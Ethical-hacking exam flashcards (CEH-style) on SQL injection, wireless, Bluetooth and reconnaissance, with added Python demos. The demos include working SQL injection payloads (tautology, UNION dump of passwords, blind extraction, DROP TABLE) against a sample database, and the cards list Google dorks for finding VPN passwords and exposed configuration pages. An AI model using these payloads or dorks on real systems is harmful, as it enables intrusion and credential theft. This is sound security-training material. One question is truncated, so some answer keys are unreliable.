Ethical Hacking
In which of the following methods does an attacker attempt to replicate error-free navigation by inputting simple input? - Determining the database engine type - Type mismatch - Parameter tampering - Determining a SELECT query structure
Determining a SELECT query structure
Which of the following attacks can take place due to flaws such as insecure cryptographic storage and information leakage? - SQL injection - Shell injection - Sensitive data exposure - Command injection
Sensitive data exposure
Which of the following is a communication standard that is also known as WiMAX and is designed to provide multiple physical layer (PHY) and MAC options? - 802.11g - 802.16 - 802.11n - 802.15.1
802.16
Which of the following techniques is NOT a best practice for securing webhooks? - Use rate limiting on webhook calls in the web server - Use threaded requests to send multiple requests simultaneously - Avoid validating the X-OP-Timestamp within the threshold of the current time - Ensure that event processing is idempotent
Avoid validating the X-OP-Timestamp within the threshold of the current time
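The three webhook practices named in the question above (validating the timestamp within a window of the current time, verifying the request before acting on it, and processing events idempotently) as a worked receiver. This is an added example, not code from the original quiz or from any particular product. The X-OP-Timestamp header is the one the question names; the X-OP-Signature header, the HMAC-SHA256 construction, the shared secret and the sample event payload are assumptions made for the example.

```python
import hmac
import hashlib
import json

# Constructed shared secret for the example (in practice: per-endpoint, stored in a secret store).
WEBHOOK_SECRET = b"constructed-shared-secret"
MAX_SKEW_SECONDS = 300  # accept X-OP-Timestamp only within +/- 5 minutes of server time

def sign(body, timestamp, secret=WEBHOOK_SECRET):
    """HMAC-SHA256 over 'timestamp.body' so the timestamp is bound to the payload
    and cannot be swapped without invalidating the signature (assumed scheme)."""
    msg = str(timestamp).encode() + b"." + body
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()

class WebhookReceiver:
    def __init__(self, secret=WEBHOOK_SECRET, max_skew=MAX_SKEW_SECONDS):
        self.secret = secret
        self.max_skew = max_skew
        self.seen_event_ids = set()   # idempotency store (in-memory for the example)
        self.processed = []

    def handle(self, headers, body, now):
        # 1. Timestamp window: a stale or far-future timestamp is a replay or a clock problem.
        try:
            ts = int(headers["X-OP-Timestamp"])
        except (KeyError, ValueError):
            return "rejected: missing timestamp"
        if abs(now - ts) > self.max_skew:
            return "rejected: stale timestamp"
        # 2. Signature check with a constant-time comparison (assumed X-OP-Signature header).
        expected = sign(body, ts, self.secret)
        if not hmac.compare_digest(expected, headers.get("X-OP-Signature", "")):
            return "rejected: bad signature"
        # 3. Idempotency: the same event delivered twice must be processed once.
        event = json.loads(body)
        if event["id"] in self.seen_event_ids:
            return "duplicate: already processed"
        self.seen_event_ids.add(event["id"])
        self.processed.append(event)
        return "processed"

def demo():
    """Constructed deliveries: one good, one replayed, one stale, two tampered."""
    now = 1_700_000_000
    body = json.dumps({"id": "evt_1", "type": "payment.settled"}).encode()
    headers = {"X-OP-Timestamp": str(now - 10), "X-OP-Signature": sign(body, now - 10)}
    rx = WebhookReceiver()
    return [
        rx.handle(headers, body, now),                               # processed
        rx.handle(headers, body, now),                               # duplicate
        rx.handle(headers, body, now + 3600),                        # stale timestamp
        rx.handle({**headers, "X-OP-Signature": "00"}, body, now),   # forged signature
        rx.handle({"X-OP-Timestamp": str(now), "X-OP-Signature": sign(body, now)},
                  body + b" ", now),                                 # altered body
    ]
```

The order of the checks matters: the timestamp is checked before the HMAC so that replayed captures are rejected cheaply, and the signature is checked before the body is parsed so that unauthenticated JSON never reaches the parser. Rate limiting, the remaining practice from the question, sits in front of this handler at the web server rather than inside it.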
Which of the following tools is employed by a pen tester to find vulnerabilities in an organization's web server and evaluate its security posture by using the same techniques as those currently employed by cybercriminals? - Netcraft - NetVizor - CORE Impact - Pupy
CORE Impact
Which of the following involves injection of malicious html code through a web application? - LDAP injection - Shell injection - SQL injection - Command injection
Command injection
Identify the reason why Web Applications are vulnerable to SQL injection attacks. - Tests the content of string variables and accepts only expected values. - Error messages reveal important information - Avoid constructing dynamic SQL with concatenated input values - Reject entries that contain binary data, escape sequences, and comment characters.
Error messages reveal important information
Which of the following is considered as a quality checking and assurance technique used to identify coding errors and security loopholes in web applications? - Hash stealing - Fuzz testing - Session hijacking - Sandboxing
Fuzz testing
Which of the following methods carries the requested data to the webserver as a part of the message body? - Cold fusion - IBM DB2 - HTTP POST - HTTP GET
HTTP POST
If a tester is attempting to ping a target that exists but receives no response or a response that states the destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option could the tester use to get a response from a host using TCP? - Broadcast ping - Traceroute - Hping - TCP ping
Hping
In which of the following attacks does an attacker use the same communication channel to perform the attack and retrieve the results? - Inferential SQL injection - Out-of-band SQL injection - In-band SQL injection - Blind SQL injection
In-band SQL injection
Which of the following is a built-in tool of Burp Suite that is used for inspecting and modifying traffic between a browser and target application? - Sequencer tool - Application-aware - Intruder tool - Intercepting proxy
Intercepting proxy
Which of the following protocols uses the port number 88/TCP and can verify the identity of a user or host connected to a network? - Kerberos - Finger - NTP - TFTP
Kerberos
Which of the following tools helps attackers identify networks by passively collecting packets and detecting standard named networks, hidden networks, and the presence of non-beaconing networks via data traffic? - Kismet - L0phtCrack - Netcraft - Robber
Kismet
Which of the following operating systems can be identified when scan results show a TTL value of 64 and TCP window size of 5840? - Linux (Kernel 2.4 and 2.6) - Solaris 7 - iOS 12.4 - Windows XP
Linux (Kernel 2.4 and 2.6)
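How the TTL and window-size answer above is applied in passive fingerprinting, as an added example that is not part of the original quiz. It constructs a raw IPv4 and TCP header pair, reads the TTL and window fields by byte offset, rounds the observed TTL up to the nearest common initial value (64, 128, 255) to undo per-hop decrements, and looks the pair up. The Linux entry is the one from the question; the other (TTL, window) pairs are commonly cited reference values and are assumptions here, not something the quiz states.

```python
import struct

# Initial TTL and default TCP window pairs. The Linux row is from the question above;
# the remaining rows are commonly cited fingerprint values (assumed for this example).
FINGERPRINTS = {
    (64, 5840): "Linux (Kernel 2.4 and 2.6)",
    (64, 65535): "FreeBSD",
    (128, 65535): "Windows XP",
    (128, 8192): "Windows 7 / Vista / Server 2008",
    (255, 8760): "Solaris 7",
    (255, 4128): "Cisco IOS 12.4",
}

INITIAL_TTLS = (64, 128, 255)

def build_packet(ttl, window, proto=6):
    """Construct a minimal IPv4 header + TCP SYN header (no options, no payload).
    Addresses are from the RFC 5737 documentation ranges."""
    ver_ihl = (4 << 4) | 5                       # IPv4, 5 x 32-bit words
    total_len = 40
    ip = struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, total_len, 0x1234, 0x4000,
                     ttl, proto, 0, bytes([192, 0, 2, 10]), bytes([198, 51, 100, 7]))
    data_offset_flags = (5 << 12) | 0x002        # 20-byte TCP header, SYN set
    tcp = struct.pack("!HHIIHHHH", 40000, 80, 1000, 0, data_offset_flags, window, 0, 0)
    return ip + tcp

def infer_initial_ttl(observed):
    """Observed TTL = initial TTL - hops, so round up to the nearest common start value."""
    for start in INITIAL_TTLS:
        if observed <= start:
            return start
    return observed

def fingerprint(packet):
    """Passive fingerprint: nothing is sent, only the captured header is inspected."""
    ihl = (packet[0] & 0x0F) * 4                 # IPv4 header length in bytes
    ttl = packet[8]                              # TTL is byte 8 of the IPv4 header
    proto = packet[9]
    if proto != 6:
        return {"ttl": ttl, "window": None, "guess": "not TCP"}
    window = struct.unpack("!H", packet[ihl + 14:ihl + 16])[0]  # bytes 14-15 of TCP header
    initial = infer_initial_ttl(ttl)
    return {
        "ttl": ttl,
        "initial_ttl": initial,
        "window": window,
        "guess": FINGERPRINTS.get((initial, window), "unknown"),
    }
```

Two fields give a hint, not proof: window size changes with window scaling and kernel version, and TTL rounding assumes the sender started from one of the three common values, so a real tool combines these with other fields (DF bit, options order, MSS) before committing to a guess.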
Which of the following tools does an attacker use to perform SQL injection exploitation through techniques such as union and blind SQL exploitation and bypass certain IPS/IDS rules with generic filters? - Mole - Astra - Weevely - China Chopper
Mole
Which of the following web services is a repository that contains a collection of user-submitted notes or messages on various subjects and topics? - Online reputation services - People search services - NNTP Usenet newsgroups - Business profile sites
NNTP Usenet newsgroups
Which of the following protocols encapsulates EAP within an encrypted and authenticated Transport Layer Security (TLS) tunnel? - RADIUS - PEAP - LEAP - CCMP
PEAP
Which of the following technologies belongs to the application layer and is used to generate dynamic web content? - Apache - Linux - MySQL - PHP
PHP
Which of the following features in FOCA allows an attacker to find more servers in the same segment of a determined address? - DNS search - IP resolution - Web search - PTR scanning
PTR scanning
Which of the following attacks is possible when an attacker executes .bat or .cmd files and changes the values by superimposing one or more operating-system commands through the request? - WS-address spoofing - XML injection attack - Parsing attack - SOAPAction spoofing
Parsing attack
A penetration tester was hired to perform a penetration test for a bank. The tester began searching for IP ranges owned by the bank, performing lookups on the bank's DNS servers, reading news articles online about the bank, watching the bank employees time in and out, searching the bank's job postings (paying special attention to IT-related jobs), and visiting the local dumpster for the bank's corporate office. What phase of the penetration test is the tester currently in? - Passive information gathering - Information reporting - Vulnerability assessment - Active information gathering
Passive information gathering
In which of the following attacks does an attacker inject an additional malicious query into an original query to make the DBMS execute multiple SQL queries? - System stored procedure - Illegal/logically incorrect query - Tautology - Piggybacked query
Piggybacked query
In which of the following attacks does an attacker inject an additional malicious query to the original query? - Tautology - In-line comment - Piggybacked query - UNION SQL injection
Piggybacked query
In which type of fuzz testing does the protocol fuzzer send forged packets to the target application that is to be tested? - None of the above - Generation-based - Protocol-based - Mutation-based
Protocol-based
Which of the following is the result obtained after the SQL query "SELECT * From User_Data Where Email_ID
Return data mode
Which of the following DNS record types indicates the authority for a domain of the target DNS server? - SRV - PTR - SOA - CNAME
SOA
Which of the following built-in tools of Burp Suite is used for testing the randomness of session tokens? - Application-aware spider - Sequencer tool - Intruder tool - Intercepting proxy
Sequencer tool
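What a Sequencer-style randomness check does with a sample of session tokens, as an added example that is not taken from Burp Suite or from the original quiz. It compares a constructed weak generator (a counter rendered as 32 hex characters, which looks random to the eye) against Python's secrets.token_hex using three cheap statistics; the thresholds and the "weak" verdict rule are assumptions for the example.

```python
import math
import secrets
from collections import Counter

def weak_tokens(n, seed=0xDEADBEEF):
    """Constructed weak generator: an incrementing counter formatted as 32 hex chars."""
    return ["%032x" % (seed + i) for i in range(n)]

def strong_tokens(n):
    """CSPRNG-backed tokens, 128 bits each, for comparison."""
    return [secrets.token_hex(16) for _ in range(n)]

def shannon_entropy_bits(tokens):
    """Entropy per character over the whole sample; hex can reach at most 4 bits."""
    counts = Counter("".join(tokens))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())

def constant_positions(tokens):
    """Character positions that never change across the sample carry no entropy."""
    length = len(tokens[0])
    return sum(1 for i in range(length) if len({t[i] for t in tokens}) == 1)

def sequential_pairs(tokens):
    """Adjacent tokens that differ by exactly 1 when read as one big hex integer:
    the signature of a counter, which lets an attacker predict the next session."""
    ints = [int(t, 16) for t in tokens]
    return sum(1 for a, b in zip(ints, ints[1:]) if b - a == 1)

def assess(tokens):
    fixed = constant_positions(tokens)
    seq = sequential_pairs(tokens)
    # Verdict rule is an assumption for the example; real tools run many more tests.
    weak = fixed > 0 or seq > len(tokens) // 10
    return {
        "entropy_bits_per_char": round(shannon_entropy_bits(tokens), 2),
        "max_bits_per_char": math.log2(16),
        "constant_positions": fixed,
        "sequential_pairs": seq,
        "verdict": "weak" if weak else "no obvious weakness",
    }
```

Passing these checks does not prove a token is unpredictable (a seeded Mersenne Twister would pass all three), which is why the verdict is phrased as "no obvious weakness" and why a sample of several hundred tokens captured from the live application is the starting point, not the conclusion.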
Which of the following does not provide cryptographic integrity protection? - WPA2 - WPA - WEP - TKIP
WEP
Which of the following techniques is NOT a countermeasure for securing files and directories on a web server? - Eliminate sensitive configuration information within the byte code - Disable the serving of directory listings - Eliminate unnecessary files within .jar files - Map virtual directories between two different servers or over a network
Map virtual directories between two different servers or over a network
Which of the following is a DNS interrogation tool that allows an attacker to retrieve information about the location and type of servers related to the target web infrastructure? - Halberd - Vega - WAFW00F - Professional Toolset
Professional Toolset
In which of the following database technologies is the SQL query [ Select * from syscat.columns where tabname='table name' ] used for column enumeration? - MySQL - MSSQL - DB2 - Oracle
DB2
Which of the following is used to detect bugs and irregularities in web applications? - Mutation-based fuzz testing - Protocol-based fuzz testing - Generation-based fuzz testing - Source code review
Source code review
Which of the following types of DNS records points to a host's IP address? - TXT - A - HINFO - NS
A
Which of the following tools is used to build rules that aim to detect SQL injection attacks? - Super Scan - Snort - Nmap - Masscan
Snort
An attacker is using the scanning tool Hping to scan and identify live hosts, open ports, and services running on a target network. He/she wants to collect all the TCP sequence numbers generated by the target host. Which of the following Hping commands he/she needs to use to gather the required information? - hping3 -S <Target IP> -p 80 --tcp-timestamp - hping3 -F -P -U 10.0.0.25 -p 80 - hping3 <Target IP> -Q -p 139 -s - hping3 -A <Target IP> -p 80
hping3 <Target IP> -Q -p 139 -s
Which of the following is the Google dork that helps an attacker find the configuration pages for online VoIP devices? - intitle:"Sipura.SPA.Configuration" -.pdf - intitle:"SPA504G Configuration" - inurl:/voice/advanced/ - intitle:Linksys SPA configuration - intitle:"Login Page" intext:"Phone Adapter Configuration Utility"
intitle:"Sipura.SPA.Configuration" -.pdf
Which one of the following is a Google search query used for VoIP footprinting to extract Cisco phone details? - intitle:"D-Link VoIP Router" "Welcome" - inurl:"NetworkConfiguration" cisco - inurl:/voice/advanced/ - intitle:Linksys SPA configuration - inurl:"ccmuser/logon.asp"
inurl:"NetworkConfiguration" cisco
In blind SQLi, attackers can steal data by asking a series of true or false questions through SQL statements. Select all the correct types of blind SQL injections. - Boolean exploitation - Tautology - Time delay - System-stored procedure
- Boolean exploitation - Time delay
WPA2 uses AES for wireless data encryption at which of the following encryption levels? - 128 bit and TKIP - 128 bit and CCMP - 128 bit and CRC - 64 bit and CCMP
128 bit and CCMP
Which of the following is a standard for Wireless Local Area Networks (WLANs) that provides improved encryption for networks that use 802.11a, 802.11b, and 802.11g standards? - 802.11i - 802.11e - 802.11d - 802.11n
802.11i
Which of the following tools provides automated web application security testing with innovative technologies including DeepScan and AcuSensor technology? - IBM Security AppScan - Hping2 / Hping3 - SoftPerfect network scanner - Acunetix web vulnerability scanner
Acunetix web vulnerability scanner
In which of the following is the original data signal multiplied with a pseudo random noise spreading code? - Direct-sequence Spread Spectrum (DSSS) - Orthogonal Frequency-division Multiplexing (OFDM) - Frequency-hopping Spread Spectrum (FHSS) - Multiple input, multiple output-orthogonal frequency-division multiplexing (MIMO-OFDM)
Direct-sequence Spread Spectrum (DSSS)
Which of the following is NOT an objective of network scanning? - Discover the services running - Discover usernames and passwords - Discover the network's live hosts - Discover the services running
Discover usernames and passwords
Which of the following should NOT be followed when securing an organization from footprinting attacks? - Educating employees to use pseudonyms on blogs, groups, and forums - Enabling the geo-tagging functionality on cameras - Ensuring that critical information is not revealed in press releases, annual reports, product catalogs, and so on. - Opting for privacy services on the Whois lookup database
Enabling the geo-tagging functionality on cameras
There is a WEP encrypted wireless AP with no clients connected. In order to crack the WEP key, a fake authentication needs to be performed. Which of the following steps need to be performed by the attacker for generating fake authentication? - Set the wireless interface to monitor mode - Ensure association of source MAC address with the AP - Capture the IVs - Use cracking tools
Ensure association of source MAC address with the AP
You are doing research on SQL injection attacks. Which of the following combination of Google operators will you use to find all Wikipedia pages that contain information about SQL, injection attacks, or SQL injection techniques? - site:Wikipedia.org intitle:"SQL Injection" - allinurl: Wikipedia.org intitle:"SQL Injection" - SQL injection site:Wikipedia.org - site:Wikipedia.org related:"SQL Injection"
SQL injection site:Wikipedia.org
Which of the following is considered as a token to identify an 802.11 (Wi-Fi) network (by default it is part of the frame header sent over a wireless local area network (WLAN))? - Association - Access point - Hotspot - SSID
SSID
Which of the following is to be used to keep certain default wireless messages from broadcasting the ID to everyone? - Bluejacking - Bluesmacking - MAC Spoofing - SSID Cloaking
SSID Cloaking
During a wireless penetration test, a tester detects an AP using the WPA2 encryption. Which of the following attacks should be used to obtain the key? - The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard. - The tester must capture the WPA2 authentication handshake and then crack it. - The tester must change the MAC address of the wireless network card and then use the AirTraf tool to obtain the key. - The tester must use the tool inSSIDer to crack it using the ESSID of the network.
The tester must capture the WPA2 authentication handshake and then crack it.
Which of the following btlejack commands allows an attacker to sniff new Bluetooth low-energy connections? - btlejack -c any - btlejack -f 0x129f3244 -j - btlejack -s - btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s
btlejack -c any
Which of the following TCP communication flags confirms the receipt of a transmission and identifies the next expected sequence number? - SYN flag - RST flag - ACK flag - FIN flag
ACK flag
Which of the following cryptographic algorithms is used by CCMP? - DES - TKIP - AES - RC4
AES
In which of the following attacks does an attacker saturate an API with a massive volume of traffic from multiple infected computers or botnets to delay the API services to legitimate users? - Invalid input attack - Credential stuffing attack - Fuzzing - API DDoS attack
API DDoS attack
Which of the following is used to connect wireless devices to a wireless/wired network? - Association - Bandwidth - Access point (AP) - Hotspot
Access point (AP)
What type of OS fingerprinting technique sends specially crafted packets to the remote OS and analyzes the received response? - Active - Reflective - Passive - Distributive
Active
Which of the following stores critical HTML files related to the webpages of a domain name that will be served in response to requests? - Document root - Virtual document tree - Server root - Web proxy
Document root
If you are responsible for securing a network from any type of attack and if you have found that one of your employees is able to access any website that may lead to clickjacking attacks, what would you do to avoid the attacks? - Delete Cookies - Enable Remote Management - Harden browser permission rules - Configure Application certification rules
Harden browser permission rules
In which of the following scanning techniques does an attacker send a spoofed source address to a computer to determine the available services? - Inverse TCP flag scan - ACK flag probe scan - IDLE/IPID header scan - TCP Maimon scan
IDLE/IPID header scan
An attacker wants to exploit a webpage. From which of the following points does he start his attack process? - Identify server-side functionality - Map the attack surface - Identify entry points for user input - Identify server-side technologies
Identify entry points for user input
Which of the following countermeasures should be followed to defend against DNS hijacking? - Do not safeguard the registrant account information - Use the default router password included in the factory settings - Download audio and video codecs and other downloaders from untrusted websites - Include DNS hijacking into incident response and business continuity planning
Include DNS hijacking into incident response and business continuity planning
In which type of fuzz testing do the current data samples create new test data and the new test data again mutates to generate further random data? - Mutation-based - None of the above - Generation-based - Protocol-based
Mutation-based
Which of the following web-service APIs is programmed to generate, recover, modify, and erase different logs such as profiles, credentials, and business leads? - RESTful API - XML RPC - JSON RPC - SOAP API
SOAP API
Which of the following attacks allows an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information? - Cross-site request forgery - Session prediction - Session poisoning - Session brute-forcing
Session poisoning
In which of the following footprinting threats does an attacker collect information directly and indirectly through persuasion without using any intrusion methods? - Business loss - Corporate espionage - System and network attack - Social engineering
Social engineering
Which of the following API hacking techniques does not target the API or machine code and instead tricks users into divulging their credentials to perform further attacks? - Session replay attack - Social engineering - User spoofing - Reverse engineering
Social engineering
Which of the following countermeasures prevents buffer overruns? - Keep untrusted data separate from commands and queries. - Use the most restrictive SQL account types for applications. - Test the size and data type of the input and enforce appropriate limits. - Apply the least privilege rule to run the applications that access the DBMS.
Test the size and data type of the input and enforce appropriate limits
Which of the following conditions must be given to allow a tester to exploit a cross-site request forgery (CSRF) vulnerable web application? - The victim user must open a malicious link with an Internet Explorer prior to version 8. - The session cookies generated by the application do not have the HttpOnly flag set. - The victim user must open a malicious link with Firefox prior to version 3. - The web application should not use random tokens.
The web application should not use random tokens.
In which of the following attacks does an attacker use an ORDER BY clause to find the right number of columns in a database table? - In-line comments - UNION SQL injection - Tautology - Piggybacked query
UNION SQL injection
Which of the following includes mandatory support for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCMP)? - WPA2 - WEP - TKIP - WPA
WPA2
In one of the following defensive techniques, only the list of entities such as data type, range, size, and value that have been approved for secured access are accepted. Which is this technique? - Whitelist validation - Output encoding - Enforcing least privileges - Blacklist validation
Whitelist validation
Which of the following networks is used for very long-distance communication? - Wi-Fi - Bluetooth - ZigBee - WiMax
WiMax
Which of the following Google search queries allows an attacker to identify the FTP servers of the target organization and identify sensitive directories on FTP? - intext:pure-ftpd.conf intitle:index of - type:mil inurl:ftp ext:pdf | ps - inurl:"ftp://www." "Index of /" - inurl:github.com intext:.ftpconfig -issues
type:mil inurl:ftp ext:pdf | ps
Which of the following utilities is used by Recon-Dog to detect technologies existing in the target system? - shodan.io - Whois lookup - findsubdomains.com - wappalyzer.com
wappalyzer.com
In which of the following attacks does an attacker load the target website inside a low-opacity iframe? - DNS rebinding attack - RC4 NOMORE attack - Clickjacking attack - JavaScript hijacking
Clickjacking attack
If a threat detection software installed in any organization network either does not record the malicious event or ignores the important details about the event, then what kind of vulnerability is it? - Security misconfiguration - Broken access control - Insufficient logging and monitoring - Sensitive data exposure
Insufficient logging and monitoring
Which of the following countermeasures should be followed for the secure update and patch management of web servers? - Apply all updates, regardless of their type, on an "as-needed" basis - Use the default configurations that web servers are dispatched with - Never use virtual patches in the organization - Enable all unused script extension mappings
Apply all updates, regardless of their type, on an "as-needed" basis
Which of the following is a timing attack performed by measuring the approximate time taken by a server to process a POST request so that the existence of a username can be deduced? - Cache storage timing attack - Cross-site timing attack - Browser-based timing attack - Direct timing attack
Direct timing attack
Which of the following HTTP service port numbers is used for connecting to a remote network server system? - Port 384 - Port 81 - Port 80 - Port 88
Port 384
Which of the following Google dorks is used by an attacker to find Cisco VPN client passwords? - "Config" intitle:"Index of" intext:vpn - filetype:pcf vpn OR Group - "[main]" "enc_GroupPwd=" ext:txt - filetype:pcf "cisco" "GroupPwd"
"[main]" "enc_GroupPwd=" ext:txt
William has been hired by the ITSec, Inc. to perform web application security testing. He was asked to perform black box penetration testing to test the security of the company's web applications. No information is provided to William about the company's network and infrastructure. William notices that the company website is dynamic and must make use of a backend database. He wants to see if an SQL injection would be possible. As part of the testing, he tries to catch instances where the user input is used as part of an SQL identifier without any input sanitization. Which of the following characters should William use as the input data to catch the above instances? - Right square bracket - Semicolon - Double quote - Single quote
- Double quote - Single quote
To defend against SQL injection, a developer needs to take proper actions in configuring and developing an application. Select all correct statements that help in defending against SQL injection attacks. - Keep untrusted data separate from commands and queries. - Apply input validation only on the client-side. - Ensure that the Web configuration files for each application do not contain sensitive information. - Avoid constructing dynamic SQL with concatenated Input values.
- Keep untrusted data separate from commands and queries. - Ensure that the Web configuration files for each application do not contain sensitive information. - Avoid constructing dynamic SQL with concatenated Input values.
A tester has been hired to perform source code review of a web application to detect SQL injection vulnerabilities. As part of the testing process, he needs to get all the information about the project from the development team. During the discussion with the development team, he comes to know that the project is in the initial stage of the development cycle. As per the above scenario, which of the following processes does the tester need to follow in order to save the company's time and money? - The tester needs to perform dynamic code analysis as it uncovers bugs in the software system. - The tester needs to perform static code analysis as it covers the executable file of the code. - The tester needs to perform dynamic code analysis as it finds and fixes the defects. - The tester needs to perform static code analysis as it covers the structural and statement coverage testing.
The tester needs to perform static code analysis as it covers the structural and statement coverage testing.
Which of the following wireless standards uses modulation schemes such as GFSK, π/4-DPSK, and 8DPSK and a frequency of 2.4 GHz with data transfer rates in the range of 25-50 Mbps? - 802.11g - 802.15.1 (Bluetooth) - 802.11a - 802.16 (WiMAX)
802.15.1 (Bluetooth)
Which of the following is a type of access-control attack in which an attacker uses any USB adapter or wireless card and connects a host to an unsecured client to attack a specific client or to avoid AP security? - Ad hoc association - Promiscuous client - Client mis-association - Unauthorized association
Ad hoc association
Which of the following countermeasures should be followed to protect web applications against broken authentication and session management attacks? - Apply pass phrasing with at least five random words - Never use SSL for all authenticated parts of the application - Submit session data as part of GET and POST - Do not check weak passwords against a list of the top bad passwords
Apply pass phrasing with at least five random words
Which of the following activities of an organization on social networking sites helps an attacker footprint or collect information regarding the type of business handled by the organization? - Promotion of products - User surveys - Background checks to hire employees - User support
Background checks to hire employees
Which of the following terms describes the amount of information that may be broadcast over a connection? - BSSID - Bandwidth - ISM band - Hotspot
Bandwidth
Which of the following techniques helps the attacker in identifying the OS used on the target host in order to detect vulnerabilities on a target system? - Banner grabbing - Port scanning - Source routing - IP address decoy
Banner grabbing
In which of the following attacks does an attacker pose a true or false question to a database to determine whether an application is vulnerable to SQL injection? - Error-based SQL injection - Union SQL injection - In-Band SQL injection - Blind SQL injection
Blind SQL injection
In which of the following techniques does an attacker use logical requests such as AND/OR to bypass a firewall? - Normalization method - CRLF technique - HPF technique - Blind SQL injection
Blind SQL injection
Which of the following attacks is time-intensive because the database should generate a new statement for each newly recovered bit? - In-band SQL injection - Error-based SQL injection - UNION SQL injection - Blind SQL injection
Blind SQL injection
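The SQL injection questions above worked through on one constructed SQLite database: the tautology, the ORDER BY probe for the column count followed by UNION extraction, boolean-based blind inference one character per request (which is why the answer above calls it time-intensive), and the countermeasures from the earlier questions (parameterized queries instead of concatenated dynamic SQL, whitelist validation of type, size and character set, and a generic error instead of a database error message). This is an added example, not code from the original quiz or from any named tool; the table names, sample rows and the SAFE_NAME pattern are assumptions made for the example.

```python
import re
import sqlite3

def make_db():
    """Constructed sample database: the application's table plus one to pivot into."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (10, 'widget', 9.99), (11, 'gadget', 19.5);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'alice', 'Winter2024!', 'admin'), (2, 'bob', 'hunter2', 'user');
    """)
    return con

# Vulnerable: dynamic SQL built by concatenating untrusted input into the query text.
def vulnerable_search(con, name):
    sql = "SELECT id, name, price FROM products WHERE name = '" + name + "'"
    return con.execute(sql).fetchall()

# Tautology: closing the quote and appending OR 'a'='a makes the WHERE clause always true.
TAUTOLOGY = "x' OR 'a'='a"

def find_column_count(con, query_fn, max_cols=10):
    """UNION step 1: ORDER BY n succeeds while n <= column count, then the DB errors."""
    for n in range(1, max_cols + 1):
        try:
            query_fn(con, "x' ORDER BY %d--" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None

def union_dump(con, query_fn, cols):
    """UNION step 2: a SELECT with the same column count rides the original result set."""
    wanted = ["username", "password", "role"]
    select_list = ", ".join((wanted + ["NULL"] * cols)[:cols])
    return query_fn(con, "x' UNION SELECT %s FROM users--" % select_list)

def blind_extract(con, query_fn, target_sql, length):
    """Boolean-based blind: one true/false question per candidate character; a non-empty
    result means 'true'. Returns the recovered string and the number of requests it took."""
    recovered, requests = "", 0
    for pos in range(1, length + 1):
        for code in range(32, 127):
            requests += 1
            payload = "widget' AND unicode(substr((%s),%d,1))=%d--" % (target_sql, pos, code)
            if query_fn(con, payload):
                recovered += chr(code)
                break
    return recovered, requests

# Defence 1: parameterized query; the driver passes input as data, never as SQL text.
def parameterized_search(con, name):
    return con.execute("SELECT id, name, price FROM products WHERE name = ?", (name,)).fetchall()

# Defence 2: whitelist validation of type, size and character set, failing closed before
# the database is reached (the same check that bounds input size against buffer overruns).
SAFE_NAME = re.compile(r"[A-Za-z0-9 _-]{1,32}")   # assumed policy for product names

def safe_search(con, name):
    if not isinstance(name, str) or not SAFE_NAME.fullmatch(name):
        raise ValueError("rejected input")        # generic error: reveals nothing about the DB
    return parameterized_search(con, name)
```

Two caveats from running this against SQLite specifically: a piggybacked payload such as `x'; DROP TABLE products--` fails here only because Python's sqlite3 `execute()` refuses to run more than one statement, an accident of that API (the `executescript()` call used in `make_db`, and many other drivers, run both statements), so it is not a defence; and time-based blind injection is not shown because SQLite has no SLEEP()-style function, whereas the boolean technique above works on every engine.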
An attacker collects the make and model of target Bluetooth-enabled devices and analyzes them in an attempt to find out whether the devices are in the range of vulnerability to exploit. Identify which type of attack is performed on Bluetooth devices. - Blue Printing - BlueSniff - MAC Spoofing Attack - Bluebugging
Blue Printing
_________ is the art of collecting information about Bluetooth enabled devices such as manufacturer, device model and firmware version. - Bluejacking - BluePrinting - Bluebugging - BlueSniff
BluePrinting
Which of the following terms is used to describe an attack in which an attacker gains remote access to a target Bluetooth-enabled device without the victim being aware of it? - Bluejacking - Bluesnarfing - Bluebugging - Bluesmacking
Bluebugging
Thomas is a cyber thief trying to hack Bluetooth-enabled devices at public places. He decided to hack Bluetooth-enabled devices by using a DoS attack. He started sending an oversized ping packet to a victim's device, causing a buffer overflow and finally succeeded. What type of Bluetooth device attack is Thomas most likely performing? - Bluebugging - Bluesnarfing - Bluesmacking - Bluejacking
Bluesmacking
An attacker wants to perform a session hijacking attack. What tool should he use to achieve his objective? - Netcraft - Nessus - Burp suite - Hydra
Burp suite
Which of the following is not a patch management tool? - GFI LanGuard - Software vulnerability manager - Burp suite - Symantec client management suite
Burp suite
Steve, an attacker, wants to track the most shared content that belongs to the target organization. For this purpose, he used an advanced social search engine that displayed shared activity across all major social networks including Twitter, Facebook, LinkedIn, Google Plus, and Pinterest. What is the tool employed by Steve in the above scenario? - Robber - Vindicate - BuzzSumo - Wireshark
BuzzSumo
Which of the following techniques is used by an attacker to connect a fake account on the provider with a victim's account on the client side? - Attack on "Connect" request - CSRF on authorization response - Attack on "redirect_uri" - Access token reusage
CSRF on authorization response
Which of the following is the most effective technique in identifying vulnerabilities or flaws in the web page code? - Packet analysis - Code analysis - Traffic analysis - Data analysis
Code analysis
Which of the following types of API vulnerabilities occurs when an input is not sanitized and can be exploited by adding malicious SQL statements to input fields to steal session cookies and user credentials? - Code injections - Business logic flaws - Improper use of CORS - Sharing resources via unsigned URLs
Code injections
Mark is working as a penetration tester in InfoSEC, Inc. One day, he notices that the traffic on the internal wireless router suddenly increases by more than 50%. He knows that the company is using a wireless 802.11 a/b/g/n/ac network. He decided to capture live packets and browse the traffic to investigate the issue to find out the actual cause. Which of the following tools should Mark use to monitor the wireless network? - WiFish Finder - BlueScan - WiFiFoFum - CommView for WiFi
CommView for WiFi
In which of the following SQL injection attacks does an attacker deface a web page, insert malicious content into web pages, or alter the contents of a database? - Compromised data integrity - Authorization bypass - Remote code execution - Compromised availability of data
Compromised data integrity
You are performing a port scan with Nmap. You are in a hurry and conducting the scans at the fastest possible speed. What type of scan should you run to get very reliable results? - XMAS scan - Connect scan - Stealth scan - Fragmented packet scan
Connect scan
